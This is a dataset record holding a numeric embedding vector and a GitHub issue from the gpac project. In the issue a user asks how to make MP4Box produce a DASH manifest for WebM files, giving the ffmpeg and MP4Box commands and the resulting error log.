0.019706863909959793, -0.008416472934186459, -0.000022006996005075052, 0.0008529566694051027, 0.004113199654966593, -0.01025638822466135, -0.03220612555742264, -0.007040337659418583, 0.03278394788503647, -0.0002948521578218788, -0.006363674532622099, 0.003033579559996724, 0.0014882787363603711, 0.011427243240177631, -0.012096303515136242, 0.008081942796707153, -0.01844477280974388, 0.01419471949338913, 0.004231045488268137, 0.018064625561237335, -0.014795353636145592, 0.017547624185681343, -0.007283632177859545, 0.0012744455598294735, -0.01353326253592968, -0.017334740608930588, 0.005101583898067474, -0.014810559339821339, 0.008226399309933186, -0.0007588700973428786, -0.001020696945488453, 0.005926504731178284, 0.009655755013227463, 0.021698838099837303, -0.009473283775150776, -0.016635268926620483, -0.00386230181902647, -0.014164308086037636, -0.02989482507109642, -0.01366251241415739, 0.029043294489383698, -0.005474128760397434, 0.004535163752734661, -0.009328827261924744, 0.0005274551222100854, -0.013692924752831459, -0.014247940853238106, 0.0020033789332956076, 0.004280464723706245, 0.011624920181930065, -0.007785427384078503, 0.0010834212880581617, 0.021546779200434685, -0.008393663913011551, -0.0063902847468853, -0.0018912354717031121, -0.0009313621558248997, -0.005428510718047619, -0.0001923310337588191, 0.01801900751888752, -0.013776557520031929, -0.002315100282430649, -0.0021896513644605875, -0.014399999752640724, 0.01257529016584158, -0.001305807731114328, 0.006143189035356045, -0.002305596601217985, 0.0026059134397655725, -0.014012249186635017, -0.005337275564670563, 0.009100738912820816, 0.010096726007759571, 0.00508637772873044, -0.01353326253592968, 0.015814149752259254, 0.018870538100600243, 0.008211192674934864, -0.002577402163296938, 0.010286800563335419, -0.03171953558921814, 0.0007949841674417257, 0.008971489034593105, -0.005656599532812834, -0.00988384336233139, 0.01228637807071209, 0.01552523672580719, 0.007678986061364412, -0.0011689545353874564, 0.00930601917207241, -0.00039250263944268227, -0.025682786479592323, -0.0022485742811113596, -0.0024234424345195293, 0.0218356903642416, -0.00724561745300889, 0.010507285594940186, -0.02341710589826107, -0.010621330700814724, 0.005139598622918129, 0.003685533069074154, -0.019615627825260162, -0.0015918690478429198, -0.016087856143712997, 0.011776980012655258, -0.022960929200053215, -0.0023227031342685223, 0.016042238101363182, -0.0013191129546612501, 0.010514888912439346, 0.025196198374032974, -0.0037026398349553347, -0.002106019062921405, -0.007184793706983328, 0.002602111781015992, -0.018247095867991447, -0.006089968141168356, -0.020284688100218773, 0.004618796054273844, 0.004626398906111717, -0.018642449751496315, 0.020360717549920082, 0.019722068682312965, -0.009176768362522125, 0.0010843717027455568, -0.015548045746982098, 0.0032122491393238306, -0.004523759242147207, 0.010507285594940186, 0.010142344050109386, 0.027872439473867416, -0.04242449626326561, 0.010142344050109386, -0.005964519456028938, -0.0027218584436923265, 0.00040628298302181065, -0.0016717000398784876, 0.0030772965401411057, 0.00583146745339036, -0.012696937657892704, 0.00685026403516531, 0.013251952826976776, 0.009914255701005459, -0.016468003392219543, 0.0038661034777760506, -0.012970644049346447, -0.02042154036462307, 0.009625342674553394, 0.01941795088350773, -0.0031704327557235956, -0.0005117740365676582, -0.01465089712291956, 0.004998943768441677, -0.01634635590016842, 0.009663357399404049, 0.011533685028553009, -0.012902216985821724, -0.0034802532754838467, -0.004310876131057739, -0.0014740232145413756, -0.009252797812223434, 0.035490602254867554, 0.025196198374032974, -0.0023017951752990484, -0.0008610348450019956, -0.0011062301928177476, 0.00527265015989542, 0.012339598499238491, -0.010317211970686913, -0.02125786617398262, 0.0033567051868885756, 0.02358437143266201, -0.004903906956315041, 0.015456810593605042, -0.002805490978062153, -0.013198732398450375, -0.015874972566962242, 0.024207813665270805, 0.019493980333209038, 0.013107497245073318, 0.011495670303702354, -0.0006291446625255048, 0.01885533146560192, 0.0004559397930279374, -0.030442237854003906, -0.007580147590488195, -0.01503104530274868, 0.004189229104667902, 0.010720168240368366, -0.009100738912820816, 0.0005531150964088738, -0.002153537468984723, 0.006070960778743029, 0.0007194297504611313, 0.00005286430678097531, -0.011282787658274174, -0.0070327348075807095, -0.01531995739787817, -0.010583315044641495, 0.011259978637099266, 0.01158690545707941, 0.02797888033092022, -0.019646039232611656, 0.015601267106831074, 0.005709820427000523, -0.0032293556723743677, -0.027872439473867416, -0.001907391706481576, -0.006618373561650515, -0.006245828699320555, -0.0014550158521160483, -0.015175500884652138, -0.02781161479651928, -0.014681309461593628, 0.0010691657662391663, 0.025257021188735962, 0.0035448784474283457, -0.018383948132395744, 0.03263188898563385, 0.003791974624618888, -0.00546272424980998, -0.0031305174343287945, -0.0018180569168180227, -0.01078859530389309, -0.021288277581334114, 0.0016260823467746377, 0.03030538372695446, -0.021379513666033745, -0.006721013691276312, -0.01777571253478527, 0.008135163225233555, 0.0020756071899086237, 0.009777402505278587, -0.004288067575544119, -0.007279830984771252, -0.01969165727496147, -0.009412460029125214, -0.010834213346242905, -0.010294402949512005, -0.011024286970496178, 0.026944877579808235, -0.008903061971068382, -0.0031305174343287945, 0.027020907029509544, -0.004364097025245428, -0.006542344111949205, 0.01710665225982666, 0.012012671679258347, -0.025865258648991585, 0.0012335797073319554, -0.021151425316929817, -0.023964518681168556, 0.00862935557961464, -0.004862090572714806, -0.022048573940992355, 0.00020100316032767296, 0.012377613224089146, -0.00967096071690321, -0.007861456833779812, -0.027598731219768524, 0.00023034581681713462, -0.00842407625168562, 0.02997085452079773, -0.0010929249692708254, 0.025454698130488396, -0.0005859028315171599, 0.012560084462165833, -0.022808870300650597, -0.013312776573002338, -0.009032312780618668, -0.0191898625344038, 0.01332798320800066, -0.0076523758471012115, -0.00805153138935566, -0.0015890179201960564, 0.008773812092840672, -0.020619217306375504, -0.019220273941755295, 0.012195141986012459, 0.001819957746192813, -0.02224625088274479, -0.00431467778980732, 0.025211403146386147, 0.0018931361846625805, -0.014795353636145592, 0.009518901817500591, -0.0021896513644605875, 0.004865892231464386, -0.007359662093222141, -0.005945512093603611, 0.0007089757127687335, -0.010438859462738037, -0.0255611389875412, -0.011640126816928387, -0.008979091420769691, -0.023356283083558083, 0.0018209080444648862, -0.01100147794932127, -0.0010473072761669755, 0.004580781329423189, -0.006527137942612171, 0.017578035593032837, 0.00013079460768494755, 0.012795776128768921, -0.00677043292671442, 0.024633578956127167, 0.010598521679639816, 0.02632143534719944, -0.016315944492816925, -0.003295881673693657, -0.014757338911294937, 0.013137908652424812, -0.005785849876701832, -0.007279830984771252, -0.015753325074911118, -0.01552523672580719, 0.0024196410086005926, -0.015175500884652138, 0.009899049066007137, -0.007899471558630466, -0.023553960025310516, -0.03564266115427017, -0.01742597669363022, 0.0013637803494930267, 0.01585976779460907, 0.00871298834681511, -0.0035372755955904722, 0.019782893359661102, -0.018049418926239014, -0.011579303070902824, -0.009739386849105358, -0.0016688489122316241, 0.012544877827167511, 0.0010463568614795804, -0.021394720301032066, 0.004926715977489948, -0.01736515201628208, 0.027689967304468155, 0.009123547933995724, -0.0010340020526200533, -0.01025638822466135, 0.005979725159704685, 0.013898204080760479, 0.01287180557847023, -0.002689545974135399, -0.014886588789522648, 0.0047746566124260426, 0.01054530031979084, -0.01567729562520981, 0.00011309397814329714, 0.020375924184918404, 0.002881520427763462, 0.013183526694774628, 0.010149947367608547, 0.007371066138148308, -0.01449123490601778, 0.02448152005672455, 0.01742597669363022, -0.005189017858356237, 0.01345723308622837, 0.0029309396632015705, -0.017000211402773857, -0.006348468828946352, -0.004786061123013496, -0.004744244739413261, 0.015304751694202423, 0.005922703072428703, -0.02740105614066124, -0.0028168954886496067, 0.00045213830890133977, 0.0054095033556222916, 0.018475184217095375, 0.02034551091492176, 0.008378458209335804, -0.005930305924266577, 0.003185638692229986, 0.018718479201197624, -0.007310242857784033, -0.002427243860438466, -0.001766736968420446, -0.02248954586684704, -0.004736641887575388, 0.010948257520794868, -0.01809503696858883, -0.016057444736361504, -0.003191340947523713, -0.012354804202914238, -0.01769968308508396, 0.006987117230892181, -0.020984159782528877, 0.03655501455068588, -0.0008106652530841529, -0.012362407520413399, -0.005500738974660635, -0.0071201687678694725, 0.007108764257282019, 0.01928109861910343, -0.03063991479575634, 0.011206758208572865, -0.022459132596850395, 0.0199197456240654, 0.03132418170571327, 0.013974234461784363, -0.02589567005634308, -0.0051319957710802555, -0.00854572281241417, -0.01138162612915039, -0.020892923697829247, 0.0003309661988168955, -0.0010520591167733073, 0.001534846844151616, -0.013191129080951214, -0.024861667305231094, -0.005812460090965033, -0.005740232300013304, -0.0104996832087636, 0.02425343170762062, 0.027842026203870773, -0.049206335097551346, 0.014042660593986511, 0.010689756833016872, -0.012088701128959656, 0.0003307285951450467, -0.010537697933614254, -0.008021119050681591, -0.0000731784530216828, 0.004656810779124498, -0.0032350579276680946, 0.0007493664161302149, 0.015874972566962242, 0.005371488630771637, 0.009344033896923065, -0.02572840452194214, -0.007488911971449852, -0.006641182582825422, 0.012195141986012459, -0.018034212291240692, -0.00001611173320270609, 0.0059987325221300125, -0.0036456177476793528, -0.0014246039791032672, 0.0255611389875412, 0.012963040731847286, 0.02373643033206463, -0.003529672510921955, -0.003934530075639486, -0.03926166892051697, 0.0027256598696112633, 0.008743399754166603, 0.0038337907753884792, 0.009169165976345539, -0.01719788834452629, 0.007568743079900742, -0.0036836324725300074, 0.0016659979010000825, 0.00047304644249379635, -0.009929461404681206, 0.01353326253592968, -0.006682998966425657, 0.0010606123832985759, 0.0066297780722379684, 0.0031286166049540043, 0.011967053636908531, -0.008325237780809402, -0.007876662537455559, 0.010362830013036728, 0.010849419049918652, 0.003915522713214159, 0.0016640970716252923, -0.016179092228412628, -0.011571699753403664, 0.004219640977680683, -0.0038470958825200796, -0.006181203760206699, 0.002683843718841672, 0.00225237593986094, 0.006682998966425657, -0.0070327348075807095, -0.018703272566199303, 0.0010397043079137802, -0.008963885717093945, 0.017623653635382652, -0.009610136970877647, 0.017638858407735825, 0.007998310029506683, 0.009017106145620346, -0.004702428821474314, 0.0038756071589887142, -0.016468003392219543, -0.012772967107594013, 0.0007574445335194468, -0.015996620059013367, 0.0006248679710552096, -0.0029081308748573065, -0.010978668928146362, 0.012803378514945507, -0.00854572281241417, 0.03112650476396084, -0.0031172120943665504, -0.011571699753403664, 0.016072649508714676, 0.012240760028362274, 0.008690179325640202, -0.01943315751850605, 0.010073916986584663, 0.018125448375940323, 0.025956492871046066, 0.005420907866209745, 0.015167898498475552, -0.0071619851514697075, 0.0067172120325267315, -0.022808870300650597, -0.010225976817309856, 0.022535163909196854, 0.025180991739034653, -0.007914677262306213, 0.009997887536883354, 0.021379513666033745, 0.01725871115922928, 0.020239070057868958, 0.00951129850000143, -0.025545934215188026, 0.01017275545746088, -0.002934741321951151, 0.0006543294293805957, -0.002368320943787694, -0.0350344218313694, 0.005215628072619438, -0.006774234119802713, -0.00583146745339036, 0.014970221556723118, -0.010803801007568836, -0.018079830333590508, 0.006344667170196772, -0.011564096435904503, 0.0018247095867991447, -0.0021421329583972692, -0.0030906018801033497, 0.0026800420600920916, 0.011716156266629696, 0.025971699506044388, -0.007907074876129627, -0.0012582893250510097, 0.00226378021761775, 0.002520380076020956, 0.016087856143712997, 0.0009874339448288083, -0.01025638822466135, 0.0004511879524216056, 0.007952692918479443, 0.0037482576444745064, -0.01703062281012535, 0.0006890179356560111, -0.01818627119064331, 0.0013134106993675232, 0.006116578355431557, 0.014354381710290909, 0.013023864477872849, 0.006306652445346117, 0.03214529901742935, 0.009108342230319977, 0.0030620908364653587, -0.01567729562520981, 0.023812459781765938, -0.004846884869039059, -0.02375163696706295, -0.0015728615690022707, 0.0014540654374286532, 0.0041816262528300285, 0.0023360084742307663, -0.0034612459130585194, -0.017167475074529648, 0.01660485751926899, 0.004021964035928249, -0.027705173939466476, 0.0066753956489264965, -0.0024709608405828476, 0.005204223562031984, 0.022778457030653954, 0.008956282399594784, 0.011282787658274174, 0.005861879326403141, 0.003668426536023617, -0.015966208651661873, -0.009397254325449467, -0.003411826677620411, 0.010590918362140656, -0.00862935557961464, 0.005124392453581095, -0.0028720167465507984, 0.00938204862177372, -0.022063780575990677, -0.0031248151790350676, 0.025682786479592323, -0.03542977571487427, -0.015053854323923588, -0.026838436722755432, 0.004105596337467432, 0.005523547995835543, -0.0019406545907258987, 0.027416260913014412, -0.012636113911867142, 0.012506863102316856, 0.016209503635764122, 0.0008453537011519074, 0.012522069737315178, -0.000808289332780987, 0.013229144737124443, 0.011275184340775013, -0.005470327101647854, 0.0003611404390539974, -0.007656177040189505, -0.015646884217858315, -0.013054275885224342, 0.004204434808343649, 0.018703272566199303, 0.015137486159801483, 0.02300654724240303, 0.014453220181167126, -0.01900739036500454, 0.005572967231273651, -0.02565237507224083, 0.003980147652328014, 0.010454065166413784, 0.002991763409227133, 0.00028297252720221877, 0.005253642797470093, -0.014217528514564037, 0.0028739175759255886, 0.004345089662820101, -0.003658922854810953, -0.009100738912820816, -0.002588806673884392, -0.014323970302939415, 0.005367687437683344, 0.00817317795008421, -0.006078563630580902, 0.03178035840392113, 0.028191762045025826, -0.008005913347005844, 0.004063780419528484, -0.008568531833589077, 0.015966208651661873, 0.011579303070902824, -0.00817317795008421, -0.0004861140332650393, 0.006371277384459972, -0.024724815040826797, 0.02425343170762062, 0.009374445304274559, -0.004592185840010643, -0.006816050503402948, 0.004964730702340603, -0.0052194297313690186, -0.0024709608405828476, 0.0059379092417657375, -0.0030906018801033497, -0.000644825748167932, -0.0026572332717478275, -0.03786272183060646, 0.017958182841539383, -0.006283843424171209, 0.002670538378879428, -0.007846251130104065, -0.012742554768919945, 0.019311510026454926, 0.00676663126796484, 0.016407180577516556, 0.0009560717735439539, -0.008789017796516418, -0.026367053389549255, 0.002334107644855976, -0.003202745458111167, 0.00366462511010468, 0.01344962976872921, 0.008249207399785519, 0.009617740288376808, 0.008142766542732716, 0.011465257965028286, 0.005158605985343456, 0.002391129732131958, -0.019782893359661102, 0.013419218361377716, 0.00011784582602558658, -0.015464413911104202, -0.004447729326784611, -0.01593579724431038, -0.017623653635382652, 0.004554171115159988, 0.007063146680593491, 0.03138500452041626, 0.019478773698210716, 0.005303062032908201, 0.005706018768250942, -0.01925068534910679, -0.011039492674171925, -0.01158690545707941, -0.013480042107403278, -0.005949313286691904, -0.00155100307893008, -0.011624920181930065, -0.0012801478151232004, 0.00516620883718133, -0.003440337721258402, -0.0014825764810666442, 0.0006400739075616002, 0.006793241482228041, 0.0016812037210911512, -0.001779091777279973, -0.01850559562444687, 0.003995353821665049, 0.0065309396013617516, -0.0175172109156847, -0.0034042238257825375, 0.03302724286913872, -0.0010235480731353164, -0.025089755654335022, -0.01324435044080019, -0.01584456115961075, 0.017137063667178154, -0.022854486480355263, 0.002088912297040224, -0.013411615043878555, -0.0008795670582912862, 0.020451953634619713, 0.011221963912248611, 0.020056599751114845, 0.010750580579042435, -0.004618796054273844, -0.0010606123832985759, 0.005633790977299213, 0.011837802827358246, 0.007838647812604904, 0.006200211122632027, -0.008043928071856499, -0.012088701128959656, 0.0037767686881124973, -0.005230834241956472, 0.01005110889673233, 0.008066737093031406, -0.011967053636908531, -0.005371488630771637, 0.010492079891264439, 0.0038413938600569963, -0.0017743399366736412, 0.004443928133696318, 0.02265680953860283, -0.012370009906589985, -0.0007094508619047701, 0.016422385349869728, 0.01595100201666355, 0.0019634636119008064, 0.008059133775532246, 0.01928109861910343, 0.007154382299631834, 0.01078859530389309, 0.013837381266057491, -0.001522492035292089, 0.01004350557923317, -0.006439703982323408, -0.01777571253478527, 0.02116663008928299, 0.008697782643139362, -0.003134318860247731, 0.0030715945176780224, -0.002497571287676692, -0.008401267230510712, 0.012909820303320885, -0.02765955589711666, 0.03920084238052368, 0.021774867549538612, 0.01553284004330635, -0.01928109861910343, -0.01556325238198042, 0.004113199654966593, 0.013282365165650845, -0.0020432944875210524, -0.02896726503968239, 0.005633790977299213, -0.018536007031798363, -0.023949313908815384, 0.0030829987954348326, -0.00921478308737278, -0.0124156279489398, 0.0003483104519546032, -0.006116578355431557, -0.010742977261543274, -0.013730939477682114, 0.002894825767725706, 0.018536007031798363, 0.02299134060740471, 0.003938331268727779, 0.015411192551255226, 0.008690179325640202, -0.01643759198486805, 0.010834213346242905, -0.004379302728921175, 0.019372332841157913, 0.005861879326403141, -0.013556071557104588, -0.0028454065322875977, 0.012081097811460495, -0.0036152058746665716, -0.0013742344453930855, 0.0009156810701824725, -0.0405389629304409, 0.01634635590016842, 0.009823019616305828, 0.00206420267932117, -0.009100738912820816, 0.011556494049727917, -0.016985004767775536, 0.010826610028743744, 0.008811826817691326, -0.009975078515708447, 0.001125237555243075, 0.006816050503402948, 0.00801351573318243, -0.019144244492053986, 0.003839493030682206, 0.025850052013993263, 0.0000011656876495180768, 0.011419640854001045, -0.02358437143266201, 0.0015148890670388937, -0.014552058652043343, 0.0073520587757229805, -0.018779302015900612, 0.02673199586570263, -0.0046454062685370445, 0.016878563910722733, -0.009541710838675499, 0.001096726511605084, 0.001935902750119567, 0.005774445366114378, -0.021638013422489166, -0.015905385836958885, 0.00282449834048748, -0.020056599751114845, -0.02175966091454029, 0.004949524533003569, 0.0053182682022452354, -0.01928109861910343, -0.027096936479210854, -0.008948680013418198, 0.00042624076013453305, 0.004375501535832882, -0.020786482840776443, 0.013624497689306736, 0.022474339231848717, 0.048050686717033386, 0.0011480464600026608, 0.014438014477491379, -0.018779302015900612, 0.002309398027136922, -0.00685026403516531, 0.010355226695537567, -0.016711298376321793, 0.002315100282430649, 0.007416684180498123, 0.009541710838675499, 0.012088701128959656, 0.003073495114222169, -0.00856092944741249, 0.003563885809853673, 0.009997887536883354, -0.010111931711435318, 0.015434001572430134, 0.0005208025104366243, 0.0020470961462706327, 0.005607180297374725, -0.011252375319600105, 0.013229144737124443, -0.011921435594558716, -0.014042660593986511, -0.0003447465714998543, 0.008462090976536274, 0.005481731612235308, 0.01556325238198042, 0.017988594248890877, 0.021881308406591415, -0.013715733774006367, -0.00666399160400033, 0.0009028511121869087, 0.0028796198312193155, -0.0007479408523067832, 0.02025427669286728, 0.004307074937969446, 0.0114576555788517, -0.006808447651565075, -0.003885110840201378, 0.018338331952691078, 0.0005588172934949398, 0.009921858087182045, 0.0008030622848309577, 0.004630200564861298, -0.021714042872190475, -0.0019130939617753029, -0.012468848377466202, 0.023614782840013504, -0.010271593928337097, 0.006025343202054501, -0.01634635590016842, -0.015631679445505142, 0.030335796996951103, 0.029423441737890244, 0.004466737154871225, -0.012233156710863113, -0.01515269186347723, 0.018536007031798363, -0.018824920058250427, -0.01999577507376671, 0.012179936282336712, 0.013692924752831459, 0.008781414479017258, -0.006998521275818348, 0.0014673706609755754, 0.006344667170196772, 0.0009351636399514973, -0.004782259464263916, -0.00770179508253932, 0.01701541617512703, 0.021942133083939552, -0.01300105545669794, -0.007196198217570782, 0.0048582893796265125, -0.0059987325221300125, 0.009055120870471, 0.012195141986012459, 0.002497571287676692, -0.0005255543510429561, -0.016315944492816925, -0.01993495225906372, -0.020284688100218773, 0.01174656767398119, -0.01420232281088829, 0.00015799893299117684, -0.017578035593032837, -0.0041398098692297935, -0.0011347412364557385, -0.015411192551255226, -0.008895458653569221, -0.005656599532812834, -0.005014149937778711, 0.006055755075067282, -0.04059978947043419, -0.010940654203295708, 0.003208447713404894, 0.014620485715568066, -0.0026458287611603737, -0.01316071767359972, -0.014263146556913853, -0.01876409724354744, -0.010735374875366688, 0.01041605044156313, 0.0007802534382790327, -0.003976346459239721, -0.014088278636336327, 0.007180992513895035, -0.00583526911213994, -0.012423231266438961, 0.0016089756973087788, 0.011176345869898796, 0.013548468239605427, 0.00876620877534151, 0.017654065042734146, 0.006994720082730055, -0.01725871115922928, 0.013305174186825752, 0.0066753956489264965, 0.021485954523086548, -0.014247940853238106, 0.0029974656645208597, 0.010028299875557423, 0.001062513212673366, 0.006880675442516804, -0.009990285150706768, 0.00043598204501904547, -0.02334107644855976, 0.0011299893958494067, -0.013959027826786041, -0.0011737063759937882, -0.0038775077555328608, 0.00553875369951129, -0.0026591341011226177, 0.0031457231380045414, 0.007458500098437071, 0.013206335715949535, 0.006857866887003183, 0.0075231255032122135, -0.016376769170165062, -0.015228722244501114, 0.027583526447415352, 0.003301583928987384, 0.00015253431047312915, -0.015502428635954857, -0.005074973683804274, -0.04482703283429146, -0.004497148562222719, 0.009123547933995724, 0.007454698905348778, -0.017745301127433777, 0.0040523759089410305, -0.0005284054786898196, -0.01783653534948826, 0.0054513197392225266, -0.0032179513946175575, 0.015814149752259254, -0.0015994720160961151, -0.007253220304846764, 0.01967645063996315, 0.001493980991654098, 0.0027978878933936357, 0.033179301768541336, -0.00703653646633029, -0.007082154043018818, -0.0010834212880581617, -0.01286420226097107, 0.001872227992862463, -0.011875818483531475, -0.018916156142950058, 0.010735374875366688, -0.03910961002111435, -0.010309608653187752, 0.006648785434663296, 0.024435902014374733, 0.011989862658083439, 0.020710453391075134, -0.010476874187588692, -0.007154382299631834, -0.013692924752831459, 0.00021502110757865012, 0.005629989318549633, 0.010606124065816402, -0.007348257582634687, 0.017988594248890877, 0.018034212291240692, -0.001604223856702447, -0.017213093116879463, 0.05255163460969925, 0.017502006143331528, -0.0043678986839950085, 0.009823019616305828, 0.01270454004406929, 0.009838225319981575, 0.00610137265175581, -0.01419471949338913, -0.012719746679067612, 0.017790917307138443, -0.0005407602875493467, 0.004702428821474314, 0.0059112985618412495, -0.018779302015900612, -0.0029024286195635796, -0.003107708413153887, -0.005842871963977814, 0.009435269050300121, -0.02788764424622059, 0.0010530095314607024, -0.0033091867808252573, -0.008332840166985989, 0.032358184456825256, -0.0038128825835883617, -0.005291657522320747, 0.014681309461593628, -0.0023189017083495855, -0.010111931711435318, 0.00019446936494205147, -0.010035902261734009, 0.033422596752643585, -0.016620062291622162, -0.023143399506807327, 0.01567729562520981, 0.004835480358451605, -0.00023224655888043344, 0.003617106471210718, 0.014673706144094467, -0.011898626573383808, -0.019053008407354355, 0.018155859783291817, 0.008674973621964455, 0.0015624075895175338, 0.01494741253554821, 0.0032806757371872663, -0.003598099108785391, -0.012005068361759186, -0.0023607180919498205, 0.0017904962878674269, -0.007960295304656029, 0.0029556492809206247, 0.006435902789235115, -0.0019092924194410443, 0.008819429203867912, 0.021364307031035423, -0.014468425884842873, 0.0007313093519769609, -0.011024286970496178, -0.004968531895428896, -0.02010221779346466, -0.0037482576444745064, -0.01382977794855833, -0.02390369586646557, -0.00421203812584281, -0.012324392795562744, -0.00562238646671176, 0.004519957583397627, 0.022976133972406387, -0.01926589198410511, 0.02641267143189907, 0.0008054382051341236, -0.012598099187016487, 0.0014531150227412581, 0.010674551129341125, -0.008043928071856499, -0.021151425316929817, 0.015221118927001953, -0.005227032583206892, -0.005325871054083109, 0.006424498278647661, -0.002491869032382965, -0.011921435594558716, -0.006489123217761517, -0.014095881022512913, -0.013875395990908146, -0.019554805010557175, -0.0035163674037903547, 0.0009356388472951949, -0.02125786617398262, 0.02390369586646557, 0.015266736969351768, 0.009480887092649937, -0.021197043359279633, -0.006283843424171209, -0.01228637807071209, -0.014681309461593628, 0.0076675815507769585, 0.014080675318837166, -0.0022428722586482763, 0.0052612461149692535, -0.001423653564415872, 0.018399154767394066, -0.024466313421726227, -0.0063142552971839905, 0.01876409724354744, -0.016209503635764122, 0.0037311508785933256, -0.006618373561650515, -0.010476874187588692, 0.006458711344748735, -0.009830622933804989, -0.009746990166604519, -0.01934192143380642, 0.009108342230319977, 0.014065469615161419, 0.00628764508292079, 0.006067159119993448, 0.01842956617474556, 0.021607602015137672, -0.004478141199797392, -0.001604223856702447, -0.021790074184536934, 0.028784792870283127, 0.02109060063958168, 0.00015514783444814384, -0.01457486767321825, 0.015175500884652138, 0.017410770058631897, 0.00778162619099021, 0.01902259700000286, 0.0013371700188145041, -0.009435269050300121, 0.005960717797279358, 0.006538542453199625, 0.0034441393800079823, 0.012620908208191395, -0.004208236467093229, 0.019296303391456604, 0.027370642870664597, -0.003512565977871418, 0.0020680041052401066, 0.06544625014066696, -0.008492502383887768, 0.008804223500192165, -0.014605279080569744, -0.0038014783058315516, -0.015084265731275082, -0.010104329325258732, 0.003685533069074154, -0.03138500452041626, 0.012636113911867142, -0.000761721224989742, 0.016878563910722733, -0.002923336811363697, -0.006523336749523878, 0.0024994718842208385, 0.010347623378038406, 0.00958732794970274, -0.02075607143342495, 0.005223230924457312, -0.006922491826117039, 0.012461245991289616, -0.0025659978855401278, 0.011358817107975483, 0.001993875252082944, 0.001353326253592968, 0.002847307128831744, -0.014308764599263668, -0.009290812537074089, 0.0016821541357785463, -0.013092291541397572, -0.0012620907509699464, 0.000752692692913115, -0.01287180557847023, 0.01769968308508396, 0.014643293805420399, 0.0027199576143175364, -0.003535374766215682, 0.02749229036271572, 0.016969798132777214, 0.020147833973169327, 0.014924603514373302, -0.019326714798808098, 0.009534107521176338, 0.026762407273054123, 0.003504962893202901, -0.001796198426745832, 0.0006999471806921065, -0.008142766542732716, 0.008705385029315948, 0.010066314600408077, -0.02572840452194214, 0.009336430579423904, -0.002029989380389452, -0.005116789601743221, 0.027689967304468155, 0.008249207399785519, -0.006527137942612171, 0.02680802531540394, -0.008948680013418198, 0.005093981046229601, -0.026443082839250565, -0.010317211970686913, 0.028526293113827705 ]
210
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Hello, I am lost in creating a dash manifest for webm files and I hope you can help me. I am creating webm files with ffmpeg: ``` ffmpeg -y -i $videoFilePath -c:v libvpx -keyint_min 150 -g 150 -tile-columns 4 -frame-parallel 1 ` -f webm -dash 1 -an -s 320x180 -b:v 500k ${dashFolder}/360p-30-700k.webm ``` When I now try to create the dash manifest, i get this: ``` [Dasher] No bitrate property assigned to PID video1, computing from bitstream [Dasher] No bitrate property assigned to PID video1, computing from bitstream [Dasher] No bitrate property assigned to PID video1, computing from bitstream [Dasher] No bitrate property assigned to PID video1, computing from bitstream [Dasher] No bitrate property assigned to PID audio1, computing from bitstream [Dasher] Cannot find VPX config, using default vp08 [Dasher] Cannot find VPX config, using default vp08 [Dasher] Cannot find VPX config, using default vp08 [Dasher] Cannot find VPX config, using default vp08 [Dasher] codec parameters not known, cannot set codec string [MP4Mux] No decoder specific info found for VP08 Failed to connect filter dasher PID video1 to filter mp4mx: BitStream Not Compliant Blacklisting mp4mx as output from dasher and retrying connections [MP4Mux] No decoder specific info found for VP08 Failed to connect filter dasher PID video1 to filter mp4mx: BitStream Not Compliant Blacklisting mp4mx as output from dasher and retrying connections [MP4Mux] No decoder specific info found for VP08 Failed to connect filter dasher PID video1 to filter mp4mx: BitStream Not Compliant Blacklisting mp4mx as output from dasher and retrying connections [MP4Mux] No decoder specific info found for VP08 Failed to connect filter dasher PID video1 to filter mp4mx: BitStream Not Compliant Blacklisting mp4mx as output from dasher and retrying connections No filter chain found for PID video1 in filter dasher to any loaded filters - NOT CONNECTED No filter chain found for PID video1 in filter dasher to any loaded filters - NOT CONNECTED No filter chain found for PID video1 in filter dasher to any loaded filters - NOT CONNECTED No filter chain found for PID video1 in filter dasher to any loaded filters - NOT CONNECTED [MP4Mux] Done writing segment 1 - estimated next fragment times start 0.002 end 2 Filters not connected: fout (dst=C:/Users/AndreGa/Desktop/Converter/v7/ASM_1stSteps_ConfiguringParameterset_noUT/dash/360p-30-700k_dash_rep1init.mp4:gfopt:segdur=4000/1000:profile=onDemand:buf=1500:!check_dur:ps sh=v:subs_sidx=0:frag:xps_inband=no:psshs=moov:mime=video/mp4) (ptr=000001EA6E2AFCE0) fout (dst=C:/Users/AndreGa/Desktop/Converter/v7/ASM_1stSteps_ConfiguringParameterset_noUT/dash/480p-30-1250k_dash_rep2init.mp4:gfopt:segdur=4000/1000:profile=onDemand:buf=1500:!check_dur:p ssh=v:subs_sidx=0:frag:xps_inband=no:psshs=moov:mime=video/mp4) (ptr=000001EA6E2B0540) fout (dst=C:/Users/AndreGa/Desktop/Converter/v7/ASM_1stSteps_ConfiguringParameterset_noUT/dash/720p-30-2500k_dash_rep3init.mp4:gfopt:segdur=4000/1000:profile=onDemand:buf=1500:!check_dur:p ssh=v:subs_sidx=0:frag:xps_inband=no:psshs=moov:mime=video/mp4) (ptr=000001EA6E2B1DB0) fout (dst=C:/Users/AndreGa/Desktop/Converter/v7/ASM_1stSteps_ConfiguringParameterset_noUT/dash/1080p-30-4500k_dash_rep4init.mp4:gfopt:segdur=4000/1000:profile=onDemand:buf=1500:!check_dur: pssh=v:subs_sidx=0:frag:xps_inband=no:psshs=moov:mime=video/mp4) (ptr=000001EA6E2B2610) Error DASHing file: Internal Service Error ``` The command looks like this: ``` MP4Box -dash 4000 -frag 4000 -rap -profile onDemand -out ${dashFolder}/manifest.mpd ` ${dashFolder}/360p-30-700k.webm ` ${dashFolder}/480p-30-1250k.webm ` ${dashFolder}/720p-30-2500k.webm ` ${dashFolder}/1080p-30-4500k.webm ` ${dashFolder}/audio.webm ``` I tried it with following. Some new webm files will be created but no manifest. ``` MP4Box -dash 4000 -frag 4000 -rap -profile onDemand -out ${dashFolder}/manifest.mpd --muxtype=webm ` ${dashFolder}/360p-30-700k.webm ` ${dashFolder}/480p-30-1250k.webm ` ${dashFolder}/720p-30-2500k.webm ` ${dashFolder}/1080p-30-4500k.webm ` ${dashFolder}/audio.webm ``` How do i get the dash manifest? The manifest I can create with ffmpeg can not be read correctly by the videojs player . So I hope mp4box can create a working manifest. Thank you.
Need some help with dashing webm files
https://api.github.com/repos/gpac/gpac/issues/1818/comments
2
2021-05-28T14:43:30
2021-09-14T14:42:03Z
https://github.com/gpac/gpac/issues/1818
905,535,573
1,818
false
